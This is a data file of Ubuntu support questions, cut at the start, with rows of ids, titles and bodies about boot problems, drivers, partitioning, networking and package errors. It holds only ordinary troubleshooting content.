data . 64 bytes from 187.cache.google.com ( 202.166.193.187 ) : icmp_req=1 ttl=62 time=3.08 ms 64 bytes from 187.cache.google.com ( 202.166.193.187 ) : icmp_req=2 ttl=62 time=4.30 ms 64 bytes from 187.cache.google.com ( 202.166.193.187 ) : icmp_req=3 ttl=62 time=3.50 ms 64 bytes from 187.cache.google.com ( 202.166.193.187 ) : icmp_req=4 ttl=62 time=4.34 ms error : root @ ubuntu : ~ # sudo apt-get install iftop reading package lists ... done building dependency tree reading state information ... done e : unable to locate package iftop
339924	why do the headphones not work on my hp pavilion dv6 ?	headset does not work on ubuntu , but works on windows and other distributions of linux . i have hp pavilion dv6
339927	download google books	how to download google books ? which software is used to download google books in ubuntu ? i already tried in many ways but not recovered please help me .
339932	why do not the brightness of the screen ?	brightness control problem show but it does not work i have hp pavilion dv6 i have ubuntu 13.04 i want to control it through a software . image https : //pbs.twimg.com/media/btdkllicqaahq9d.png : large
339933	how to hibernate laptop when it overheats	i was wondering if i could set the same behavior as windows 7 do in the laptop when it overheats , it hibernates . hibernation ( from ubuntu ) works fine , after i re-enabled it . would it be possible to make the laptop hibernate whenever it overheated while running on ubuntu ? if yes , how will it be done ? some days are hot and the laptop sometimes gave in to it sometimes . i have ubuntu 13.04 and the laptop is compaq presario cq42-357tu .
339938	installing ubuntu inside windows 8	i have been using windows and ubuntu alongside each other for quite some time . till windows 7 , things were fine . i installed ubuntu inside windows and all was fine . at startup , i would be asked if i want to boot windows 7 or ubuntu and i could choose . however , starting from windows 8 , i could still install ubuntu inside windows 8 but while starting up , windows 8 boots up automatically and in the end i am asked if i wanted to boot ubuntu . then if i choose ubuntu , the machine restarts again and ubuntu is booted . this is very annoying . if i want to use ubuntu , i have to boot the device twice . i have tried reinstalling many times , with different version of ubunutu , it is always the same . is there any work around this to make it like windows 7 ? or do you suggest some other method of installing ubuntu alongside windows 8 ?
339942	usb drive - cp : can not create regular file , read-only file system	i am able to copy files from a usb flash drive , but i can not get the data ( files ) into the flash drive . it is showing : cp : can not create regular file `pendrive/12_angrymen.avi ' : read-only file system please suggest how to copy files from my system to the flash drive . the permissions of the flash drive are : drwx -- -- -- 3 santhosh santhosh 2048 jan 1 1970 pendrive/** i also ca n't change the flash drive 's permissions . please help me out .
339948	recover an overwritten file	my project c source code file became corrupted while making the tgz of the file . i wanted to make *.tgz of 4 files . the file names are common.c , common.h , myfile.c and myfile.h . i mistyped the tar command . i used the following tar command by mistake tar -cvf common . * myfile . * project.tgz this has corrupted the common.c file . is there any way to overcome this error . kindly help me . thanks
339951	why are n't the bfq and bfs schedulers included in the official ubuntu kernel ?	yesterday i read an article on speeding ubuntu up . one suggestion in the article was replacing the default i/o scheduler with bfq , which according to the article is optimized for interactive performance . a similar article points out the advantages in desktop performance when using the bfs process scheduler . both schedulers are included in numerous patchsets and alternate kernels that are known to increase desktop interactivity and performance ( e.g . linux-pf , liquorix-kernel and linux-ck ) . so my question is : given how ubuntu is striving for a great desktop experience , how come the non-server builds of the os do n't come with these schedulers when they 've been proven to be better in terms of interactive performance ? more information on the two schedulers may be found here : bfq : http : //algo.ing.unimo.it/people/paolo/disk_sched/ bfs : http : //ck.kolivas.org/patches/bfs/bfs-faq.txt
339957	beginner questions about uninstalling and more	so i just switched from windows to ubuntu . i used windows for several years , i am even comfortable wit dos but ubuntu gives me a headache atm . i am running 13.04 at the moment . how do i uninstall stuff ? i installed for example the reddit app , but i can not find it searching for it nether does sudo remove reddit work , same with google mail . i also installed boinc , which was kind of a hassle to install it in the first place , and now i want to get rid of it . it installed it as a folder on the desktop but can not remove it . i installed a lot of applications but if i hit `` show more '' the search interface does only show about 20 applications . how do i get all programs to show up ? a more specialized question but i tried to implement a box.com account following this tutorial http : //www.maketecheasier.com/auto-mount-box-net-to-linux-desktop/2012/03/27 but i do not have the options in the beginning , my `` connect to server '' looks totally different . i am able to mount it though but it says i only have 13 gb space and another 13 are full even though nothing is in there in the 50 gb account . if necessary than i would reinstall ubuntu , but i hope it will not be necessary . thanks for the help .
339962	error while launching wakfu	i installed wakfu on my ubuntu 12.04 from the source downloaded from the game website . but while opening it the following error came up : '/opt/ankama/wakfu/wakfu ' the archive /opt/ankama/wakfu/core.jar does not exist . i also installed sun java . what should i do ? thank you .
339965	ubuntu does not boot once after switching from windows 8 with dual boot	i seem to have a weird issue with dual-booing ubuntu and windows 8 ( uefi mode ) . whenever i use windows 8 , restart the machine and then boot ubuntu ( 13.04 ) with grub boot-loader , ubuntu freezes during the boot . i do not get to the login screen . however if i power off my machine after this occurs and power it on again ubuntu boots just fine . any suggestions on why this might be occurring and how to resolve it ?
339969	why wo n't xbmc play my dvds ?	i installed xbmc using the ubuntu software centre along with some codec packs on a fresh install of 12.04 today . i tested it with all kinds of media and everything ran great except for dvds . ubuntu and xbmc acknowledge there is a disc in the drive , but when i prompt xbmc to play it , it loads for a second and then stops . any ideas about what might be going wrong ?
339973	set up permanent routing ( ubuntu 13.04 )	i have 2 connections : wlan0 ( gw : 192.168.1.1 ) and eth0 ( gw : 192.168.2.1 ) . my default connection is wlan0 , but i wanted some websites load through my eth0 , so i set up routing for those websites/ips like this : route add -net 31.135.208.0/21 gw 192.168.2.1 dev eth0 this works , however is not permanent ( disappears after reboot ) . i tried to put this code in /etc/network/interfaces like this : up route add -net 31.135.208.0/21 gw 192.168.2.1 dev eth0 but when i restart ubuntu , it starts without networking ( it crashes ) . i also put these lines into that file : auto eth0 address 192.168.2.125 gateway 192.168.2.1 netmask 255.255.255.0 but still system boots without networking . currently i have put route command into /etc/rc.local , it works , but it is not permanent , because when i restart/re-connect my eth0 ( for some reason ) , routing disappears . some notes : i have long list of ips to route . my router , which i connected eth0 is set to dhcp . i tried to connect eth0 both static and dhcp way . thanks for you help !
339986	how to add a back button to go back to previous page	i 'm currently new to ubuntu programming , and learning the basic 's of it . i 've been following this tutorial as some of you might know in previous questions asked about it i 've made before . now , i 've created a web browser using 'quickly ' . it 's a simple program witch helps create programs on ubuntu . in the video it showed how to 'refresh ' the page witch is basically this code : def on_refreshbutton_clicked ( self , widget ) : self.webview.reload ( ) now , my question is to make the page go back from a previous page is it this code : def on_refreshbutton_clicked ( self , widget ) : self.webview.back ( ) i used 'refreshbutton ' as a example , but if you would like to view the full source of the the code just ask for it and i 'll provide you with a link witch you can view the source .
339990	is it possible to disable the video output in a video player but keep the audio enabled ?	i sometimes hide the video player and only listen to music . but it still uses the processor , and my computer gets hot . is there a way to temporarily disable video output and only play audio , without extraction or conversion ?
339996	i need help with my ubuntu touch	so i flashed and everything was well but after tinkering a while i ran across some problems first off a lot of my settings do n't work , some of the apps do n't either for ex the camera app just goes to a white screen . and the computer does n't recognize it . its a nexus 4 and i 'm running ubuntu on my laptop . not sure if its a bad flash , i tried to download the update but it keeps failing .
339998	synaptic initialization error	when i start synaptic , it throws the following : $ sudo synaptic [ sudo ] password for xxxxx : synaptic : error while loading shared libraries : libept.so.1.aptpkg4.12 : can not open shared object file : no such file or directory what is the reason and what is its solution ?
340000	ca n't find installed synaptics	i just installed synaptics for touchpad via ubuntu software center but i ca n't find it at all : not in the `` start '' menu or in the settings . where do i find it ?
340007	what date range must i use for a daily report ?	i want to run a report at 6am every morning that includes the log entries of the last 24 hours . do i run the report from : 2013-08-31 06:00:00 till 2013-09-01 06:00:00 or 2013-08-31 06:00:00 till 2013-09-01 05:59:59
340009	can i use the same ubuntu user on two computers ?	hello ! i am using two computers , one at home and one for school . is it possible to have the same user on two machines ( two machines sharing the same user ) ? two ubuntu computers sharing all files ? thanks !
340014	higher precision ( smoothness ) touchpad scrolling	is it currently possible to make touchpad scrolling more precise ? i know the underlying reason for the scolling jumpiness is that the scrolling itself is sent as mouse button ( 4 , 5 , 6 , 7 ) events , making it large and discrete . perhaps something is already implemented somewhere that would allow to process touchpad-based scrolling in the same way as pointer movement is processed ? for at least few applications ( e.g . firefox ) , as it would n't be possible to automatically do that for all of them . or , maybe , it is possible to set the scrolling step on the touchpad and in the applications very small ? there 'd be the event-flood problem but probably not very critical .
340015	unable to locate file syscall_table_32.s	i am using ubuntu 12 & kernel version is 3.8.0 i want to add personal syscall but unable to locate the file mentioned above . path i am trying is usr/src/linux-headers-3.8.0-19-generic/arch/x86/kernel i also tried usr/src/linux-headers-3.8.0-19-generic/arch/x86/syscalls i also tried usr/src/linux-headers-3.8.0-19/arch/x86/kernel i looked for solution in this web , stack exchange & google but still unable : ( please help
340019	evolution - > thunderbird migration and archive size	i just migrated my email from evolution 3.2.3 to thunderbird . as that version of evolution is already storing email in maildir format i exported all folders by hand into mbox format ( from within evolution , doing select all + save as ) and then imported them in thunderbird with importexporttools . this has somehow caused a dramatic size increase of my mail archive . the evolution backup is only 0.5g and after exporting everything to mbox i now have 56g on my hands ( so about a factor 100 increase ) . after importing everything into thunderbird it did not really get smaller . the two archives really contain the same data . does anyone know how this is possible ? i thought that maildir and mbox formats were more or less comparable in performance .
340021	bumblebee [ error ] can not access secondary gpu - error : [ xorg ]	though this may seem like a duplicate question , none of the suggestions i 've seen have worked for me , however nearly all posters get good results . i 'll start with hardware : metabox w350st notebook intel core i7 4700 16gb ram gtx 765m ( with optimus ) 128gb ssd 1tb sshd my initial error output when trying to optirun a game is : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 133.973920 ] [ error ] aborting because fallback start is disabled . if anything else is needed to troubleshoot this just let me know . adding bumblebee.conf : # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau driver version - output of jockey-text -l : nvidia_304_updates - nvidia_304_updates ( proprietary , enabled , not in use )
340034	ubuntu 13.04 with lvm+fde : `` failed to load config file /etc/lvm/lvm.conf '' ( does n't boot with new kernel )	i recently set up ubuntu 13.04 amd64 and checked the box for full disk encryption at the installation . it worked fine , but yesterday ubuntu ran an update and now with the new kernel ( 3.8.0-29-generic ) my system does n't boot any longer ( with the old in it still works ) . it says the following : '' there appears to be one or more degraded lvm volumes , and your root device may depend on the lvm volumes being online . one or more of the following lvm volumes are degraded : parse error at byte 611 ( line 21 ) : unexpected token failed to load config file /etc/lvm/lvm.conf gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/mapper/ubuntu -- vg-root does not exist . dropping to a shell ! ''
340035	why i have unity 5.20.0 installed , if they are already making unity 8 ?	i thought i have the lastest version available , i updated very resently . it 's the lastest version in repository . also , emacs 24 somehow not in repository either , only version 23 . update : my ubuntu version is ubuntu 12.04.3 lts
340040	kde : ca n't pin a program with `` show a launcher when not running '' option	when i launch a program and then right-click its taskbar button and select `` show a launcher when not running '' , i get a standard plasma shell popup saying that no application is associated with this task . this is a very fresh kubuntu that has n't been messed with . any ideas on how to solve it are appreciated .
340045	ubuntu does n't boot !	i installed ubuntu ver . 13.04 from a flash drive . i already partitioned my drive which has windows . i selected ex4 and formatted the disk space . it installed correctly . then it asked to restart . when i restarted it went directly to windows . i cant find the 200 gb partition on windows . when i try to boot again from the usb it went directly to the install screen . where did the hard drive space go ? how can i boot from the partition where i installed ubuntu . please help !
340047	merging extended partition with unallocated space : error	i am using ubuntu 12.10 which is on a dual boot with windows 7 . i initially had 30 gb for ubuntu , but i decided i need more , now i booted ubuntu from its live cd , used gparted , shrunk windows partition by 50 gb , so i got 50gb-unallocated space . now i want to merge that with ubuntu 's partition ( extended ) . but i keep getting an `` overlapping partition '' error , and i am not able too identify where the overlapping is happening . can anyone please help me out here ? /dev/sda4 is where my ubuntu 's 30gb extended partition is ( which contains /dev/sda5 and /dev/sda6 ) and /dev/sda3 is my windows 7 's partition . i have 50gb of unallocated space between /dev/sda3 and /dev/sda4 ubuntu @ ubuntu : ~ $ sudo fdisk -l -u disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6c48a710 device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility /dev/sda2 * 81920 29044735 14481408 7 hpfs/ntfs/exfat /dev/sda3 29044736 806342655 388648960 7 hpfs/ntfs/exfat /dev/sda4 912336894 976771071 32217089 5 extended /dev/sda5 912336896 968585215 28124160 83 linux /dev/sda6 968587264 976771071 4091904 82 linux swap / solaris disk /dev/sdb : 16.0 gb , 16008609792 bytes 255 heads , 63 sectors/track , 1946 cylinders , total 31266816 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 63 31262489 15631213+ c w95 fat32 ( lba )
340051	wifi not working on toshiba satillite s55 with ubuntu 13.04	i 'm new to ubuntu and i 'm in trouble . i just installed ubuntu 13.04 on my toshiba satillite s55-a5276 and the wifi is not working , it 's not giving me an option to search to wifi connection . i have been searching the web for solutions but no luck .
340053	no results in music lens after deleting rhythmbox	i removed rhythmbox and installed clementine . now , the music lens is empty . how can i search for music without rhythmbox ?
340055	lxc container no outgoing traffic	i am trying to setup a lxc container on a ubuntu 13.04 on a linode vps , but i ca n't ping anything outside my host . my container network config looks like this : lxc.network.type = veth lxc.network.hwaddr = 00:16:3e:04:93:57 lxc.network.ipv4 = 10.0.3.3/24 lxc.network.ipv4.gateway = 10.0.3.1 lxc.network.link = lxcbr0 lxc.network.flags = up i have add the two lines with ipv4 my self , without them i couldn’t event ping the host . on the host side ifconfig show this for the bridge and container interface : lxcbr0 : link encap : ethernet hwaddr fe : b2:8c:74:8c : fa inet addr:10.0.3.1 bcast:10.0.3.255 mask:255.255.255.0 inet6 addr : fe80 : :68aa:7eff : feb4:9959/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7179 errors:0 dropped:0 overruns:0 frame:0 tx packets:15 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2294800 ( 2.2 mb ) tx bytes:846 ( 846.0 b ) vethynhcg1 link encap : ethernet hwaddr fe : b2:8c:74:8c : fa inet6 addr : fe80 : :fcb2:8cff : fe74:8cfa/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:311 errors:0 dropped:0 overruns:0 frame:0 tx packets:14 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:64446 ( 64.4 kb ) tx bytes:2904 ( 2.9 kb ) the veth interface doesn’t get a ipv4 ip automaticly , i have tried to add one my self but it didn’t help . dmesg logs lines like this : [ 1466355.530226 ] iptables denied : in=lxcbr0 out= mac=ff : ff : ff : ff : ff : ff:00:16:3e:04:93:57:08:00 src=0.0.0.0 dst=255.255.255.255 len=328 tos=0x10 prec=0x00 ttl=128 id=0 proto=udp spt=68 dpt=67 len=308 i have tried allot of different things but nothing seems to work . this is what i have tried so fare . sudo iptables -a forward -i vethynhcg1 -o eth0 -j accept sudo iptables -a forward -i lxcbr0 -o eth0 -j accept iptables -a input -i lxcbr0 -p icmp -- icmp-type echo-request -j accept iptables -a output -o lxcbr0 -p icmp -- icmp-type echo-request -j accept iptables -a input -i lxcbr0 -p icmp -- icmp-type echo-reply -j accept iptables -a output -o lxcbr0 -p icmp -- icmp-type echo-reply -j accept iptables -t nat -a postrouting -o eth0 -j masquerade iptables -t nat -a postrouting -o lxcbr0 -j masquerade unfortunately i do not know a hole lot about networking so i am just trying anything i can find . please help .
340057	i want to know about nvidia drivers and does they suit me	i am using ubuntu 12.04 in 64 bit version in a lenovo laptop . it has the following graphics card : intel corporation core processor integrated graphics controller ( rev 02 ) i want to know if i can use nvidia drivers with this graphics card ?
340064	why it is difficult to upgrade from 11.04 to 13.04 ?	i can not update and upgrade my ubuntu and i do n't want to use another system . i want your sincere help . answers available to questions asked did n't work on my system . my version is of 11.04 . any help would be appreciated thanks . regards , khalid khan seemab
340068	pidgin does not show all online buddies	here is a photo of my problem : http : //imageshack.us/photo/my-images/833/jmzy.jpg/ as you can see there are 4 buddies online but i only see one in the system tray . what can i do that pidgin shows every online buddy in the tray ? with best regards new ubuntu user
340069	weird facebook font problem on firefox	i am using firefox 23 and ubuntu 12.04 with unity . today , i was dealing with font configuration to make them look like sharper and less blurry . after some mambo jambo , facebook started to look like this : or like this : i believe this is something related to msttcorefonts or ubuntu restricted extras or some terminal commands such as `` fc-cache '' . i do not have this problem for any other webpage . i tried to reset font settings via myunity . i tried to create a new firefox profile . i started firefox add-ons disabled . none of them worked . i have been trying to find a solution to this but could not come across one at anywhere so i decided to ask here .
340071	`` invalid theme '' using gnome 3 themes	i am trying to change the shell theme on my acer c7 chromebook laptop . i put ubuntu on the laptop with chrubuntu . i do n't know if this has anything to do with the problems i 'm running into , but i just figured i 'd put it out there . i use gnome , and i already have the tweak tool . i think i have the shell-user-theme extension , though i have encountered various errors while trying to download it in various ways . i 'm relatively new to using the terminal . when i go to theme in tweak tool , i have the option of opening a theme , but when i try to open a downloaded theme it briefly flashes `` invalid theme '' . i 'm trying to install the soothe theme ( i just want to successfully install any theme at all for starters . ) i tried a different theme , legacy , but it did n't show up at all when i went to open it in the tweak tool . am i doing something wrong ? can i fix this ? has anyone else had this problem too ? update : this tutorial says at the end that there should be a .themes folder under my home folder , however , there is n't . i tried making a folder and calling it .themes but the folder itself does n't show up in tweak tool .
340075	remove ubuntu 13.04 and put windows 7	i have installed ubuntu and chose option 'something else ' and i created partitions , but now i cant boot to windows but when i re-install ubuntu there is an option to install it along with windows 7 . i want to completely remove ubuntu 13.04 but i cant i need windows 7 for school work i tried bios , image discs iso file , but still only thing i can do is to install ubuntu 13.04 but not version 12 , 11 nor 10 .
340079	pidgin does not send photos	i can not send pictures with pidgin to my facebook-friends . does anybody know how to solve my problem ? with best regards new ubuntu user
340081	ubuntu + windows 8 - > dell 14z 5423 ahci / isrt	i just bought a dell 14z 5423 , which uses uefi/gpt and intel smart response on the windows 8 . i have been researching and studying how to use it as dual boot . thanks to this forum i was able to install ubuntu 13.04 alongside with windows 8 , disabling irst and changing sata mode to ahci . although i have n't was able to enable the isrt yet , i , letting sata mode to achi , was able to boot both windows 8 and ubuntu . today i started it and ubuntu does not boot anymore . nothing has changed . i could say that i installed some updates , by i had tested and it was ok. why it 's been so troubly to have ubuntu + windows 8 ? what do i have to do to have my ubuntu booting again ? what do i have to do to install ubuntu drivers for raid ( intel smart response ) , and then how shall i use the accelerate mode in both discs ? i really appreciate your help .
340083	how to customize the index page of apache ?	i am using an apache web server currently on my ubuntu system running 12.04 to display backed up movies , music , and photos . i am in the process of coding it to make it more appealing to people who use it , but i am having trouble removing the apache default directory contents list and replacing it ( looks like below ) . how would i remove this default directory contents list and display my content in a grid-style with thumbnails ? in reply to gertvdijk 's comment , what extra modules or extensions would i need ?
340084	is there an official list of trusted ubuntu system processes ?	list of default processes -- these running after fresh system install and after first system update . both these most important and startup processes and these less . preferably maintained by canonical and/or ubuntu community itself . is there such thing ?
340085	dualboot on multiple disks problem	i have two different hard drives and a third volume for extra storage . i installed windows 7 first , then installed ubuntu on a second hard drive . i could n't boot ubuntu with my bios reading my data under native ide mode , but could run windows 7 . now i switched it to read under ahci , and i got the boot loader to select either ubuntu or windows . now ubuntu runs fine and windows does n't . what should i do ?
340092	ubuntu and other debian derived distros not booting	i 've tried ubuntu , linux mint and debian , even though all have worked great for me i 'm keeping with ubuntu , i tested 12.04 , 12.10 and even 13.04 . the 12.04 lts is the one i work with . there 's one issue persisting in the three distros i 've tested , sometimes at random occasions the boot fails , after grub , it shows only a _ as prompt remaining indefinitely , i 've let pass up to an hour , and best i could do was to wait for a while and try again until i get it to load . everytime this happens and i 've selected recovery mode i get logs like these : so , i blame the last line : [ 0 . ... . ] booting node 0 , processors # 1 to be the issue , all first log lines appear continuously but it 'll stop then . i already updated bios , but there 's something i think it might be the issue and that 's the hyperthreading , i had disabled it after bios update and it stopped happening , now i enabled it for installing a 64 bits os in vmware player and it happened again . last i tried : editing the /boot/grub/grub.conf by adding acpi=ht in the ubuntu menu entry , not working . i googled and i 've not really found a solution .
340097	how much space does a default installation of ubuntu touch take on mako ?	i 'm just curious how big ubuntu 's rootfs would be because nexus 4 has no microsd slot and only 16gb of memory .
340098	dual-boot computer runs windows boot manager followed by grub menu : how to change to just grub ?	my dual-boot computer is displaying two boot managers in a row : first the windows 7 boot manager with the choices : windows linux and then , when i choose `` linux '' , it goes to the grub menu : ubuntu advanced options for ubuntu memory test windows 7 ( loader ) on /dev/sdb2 this double boot manager behavior is silly -- how can i boot directly into grub , bypassing the windows boot manager ? my disk setup has linux on /dev/sdb1 and windows on /dev/sdb3 : $ sudo parted -l model : ata wdc wd30efrx-68a ( scsi ) disk /dev/sda : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 17.4kb 134mb 134mb microsoft reserved partition msftres 2 135mb 2148gb 2147gb ntfs basic data partition 3 2148gb 3001gb 853gb ext4 basic data partition model : lsi 9750-4i disk ( scsi ) disk /dev/sdb : 960gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 826gb 826gb primary ext4 2 826gb 826gb 105mb primary ntfs boot 3 826gb 926gb 99.9gb primary ntfs 4 926gb 960gb 34.3gb extended 5 926gb 960gb 34.3gb logical linux-swap ( v1 ) i got into this situation as follows : my vendor set up this dual boot computer using just the windows boot manager which worked , but the version of linux was old . so , i ran the ubuntu 13.04 installer and completely deleted & reinstalled linux on /dev/sdb1 . when i tried booting into linux , it came up at the grub prompt instead of fully booting . i tried manually booting using `` set root '' , `` kernel '' , `` initrd '' , `` boot '' , but it would boot only to the `` ( initramfs ) '' prompt . so , i booted on tne ubuntu live cd and purged and reinstalled grub . this worked . i rebooted and got only a black screen with a working mouse pointer . i rebooted again , and the system finally booted fully ... but with the double boot manager as described above .
340105	trouble mounting/formating 16g sandisk usb	i 'm having trouble mounting or formating my 16gig sandisk usb . when i run sudo fdisk -l i get this return disk /dev/sdc : 16.0 gb , 16008609792 bytes 64 heads , 32 sectors/track , 15267 cylinders , total 31266816 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00041d5f and when i use the disks utility to try and format the device i get this error ( image source ) what would be the best way to mount this device , or format it so it can be readily available every time i plug it in ? is there something else hindering this device from mounting that i am not aware of ? *i have a acer aspire m5-581t 6807 -intel® core™ i5-3317u cpu @ 1.70ghz × 4 -intel® ivybridge mobile -6gigs of ram -20gb ssd -500gb hdd -lintel 4000 graphics *i 'm running ubuntu 13.04 64 bit
340119	how to delete a folder in /usr/bin ?	i tried to install adobe reader 9.bin . in terminal , i did set the path to /usr/bin . now i can not delete this app because it does not work correctly . please help me out . thanks in advance . my ubuntu is 13.04 .
340120	preload 0.6.4 not working	i installed preload on a fresh system and i get the following error : [ sun sep 1 08:59:15 2013 ] loading conf from /etc/preload.conf [ sun sep 1 08:59:15 2013 ] loading state from /var/lib/preload/preload.state [ sun sep 1 08:59:15 2013 ] failed reading state from /var/lib/preload/preload.state : line 14491 : invalid tag [ sun sep 1 08:59:15 2013 ] exiting [ sun sep 1 12:16:29 2013 ] loading conf from /etc/preload.conf [ sun sep 1 12:16:29 2013 ] loading state from /var/lib/preload/preload.state [ sun sep 1 12:16:29 2013 ] failed reading state from /var/lib/preload/preload.state : line 14491 : invalid tag [ sun sep 1 12:16:29 2013 ] exiting how can i get preload working ? ( i need it for better performance . )
340121	unmount a desktop	i was attempting to mount a iso file to a file on my desktop but unintentionally i mounted my desktop by mistake . now my desktop is readonly and i can not fix it . i tried searching but i was unable to solve it . if one could spare some help thank you : ) i am new to ubuntu so sorry for my lack of knowledge . edit i used the desktop as a mount point using gmount-iso . now its readonly .
340125	ubuntu 12.04 installation on acer ultrabook	i have a acer aspire timeline ultra m3 ultrabook , which came bundled with 16gb ssd , windows 7 and intel rapid storage technology . the 500gb hard disk has a recovery partition ( 16.5 gb ) , hibernation partition ( 4 gb ) , primary partition ( 14.6 gb ) , system reserved primary partition ( 100 mb ) and a boot primary partition ( c drive ) . i created 20gb free space from c drive . then i tried installing ubuntu 12.04 through a live cd but the screen hangs at the beginning of installation . also , i tried to run a demo for a old version of ubuntu and i get the same problem . i presume that this has something to do with ssd and intel rapid storage technology . i want a dual boot ( win 7/ubuntu 12.04 ) for the ultrabook . how do i fix this ?
340126	booting ubuntu from usb `` no possible bios file found ''	so that 's my problem , i downloaded ubuntu 13.04 32bit and i put it in a 4gb usb stick following the steps in ubuntu 's webpage . then when i restart the computer i press f12 and chose the usb stick , but then it says `` no possible bios file found , press any key to try again '' and i press any key and it keeps showing me the same error . is there any solution ? or will i have to install it from a dvd ? thanks .
340136	pc loads grub menu , but can not run ubuntu 12.04 ; diagnostics report hd failure	i recently switched to ubuntu 12.04 from windows , no regrets . a few days ago , however , i ran windows xp in virtualbox and the next time i booted my computer was brought straight to the grub menu . running `` ubuntu , with linux 3.5.0-37-generic '' returns a black screen with text : target filesystem does n't have requested /sbin/init . /bin/sh : 0 : ca n't open ro [ 30.986480 ] kernel panic - not syncing : attempted to kill init ! exitcode=0x00007f00 ... 12 more lines of text ... [ 30.987013 ] [ ffffffff816a6269 ] system_call_fastpath+0x16/0x1b running ubuntu in recovery mode is also a dead end , and returns roughly the same errors ( though there is more text ) . running a diagnostics through bios returned error code 2000-0142 , hard drive failure . but if my laptop can load grub , does n't that mean the hard drive is functioning ? i 've been trying to follow the fixes suggested on the forums , but most of them require booting ubuntu from a liveusb and then investigating the problem . however , the computer is not recognizing the bootable usb . i have adjusted the boot order in bios , but i the usb is either ignored and grub comes up , or the screen remains black and unchanging until the flash drive is removed then it displays the grub menu . the optical drive is n't picking up anything either , even after being reseated . i would greatly appreciate any help , it is probably quite obvious i am new to linux . details of my computer : dell inspiron n5010 model p10f , running ubuntu 12.04 ; processor : intel core i3 @ 2.40ghz , 64-bit
340139	undoing permission change of my entire drive	for some stupid reason i excecuted sudo chmod -r 755 / . now none of my software will run . can i fix this without reinstalling ? and if yes , how ?
340141	ubuntu 13.04 unable to set keyboard layout	i recently installed ubuntu 13.04 . when i try to add another keyboard layout ( clicking the 'layout settings ' link in system settings - > keyboard - > typing tab ) the system does n't respond . is there another way to add a keyboard layout ?
340142	terminal window terminates after double click or any text selection	i 've installed ubuntu 12.10 . after a while the following problem appeared : whenever i use mouse to select any text in the terminal ( by double clicking or by clicking at one end of a text and highlighting to the other end , the terminal would be closed . any idea ?
340144	64-bit libcrypto issues - what to do ?	i understand there 's an issue with debian libcrypto 64 ( ref http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=705218 ) . this is causing many headaches for me . i get that eventually it will be fixed , but until then what can i do to work around this problem ( without simply not using any applications that rely on libcrypto ) ? i gather that downgrading a package can be a major pita , but if that 's what it 's going to take i 'll do it . i just ca n't have crypto crashing apps all the time , nor am i willing to deal with no encryption .
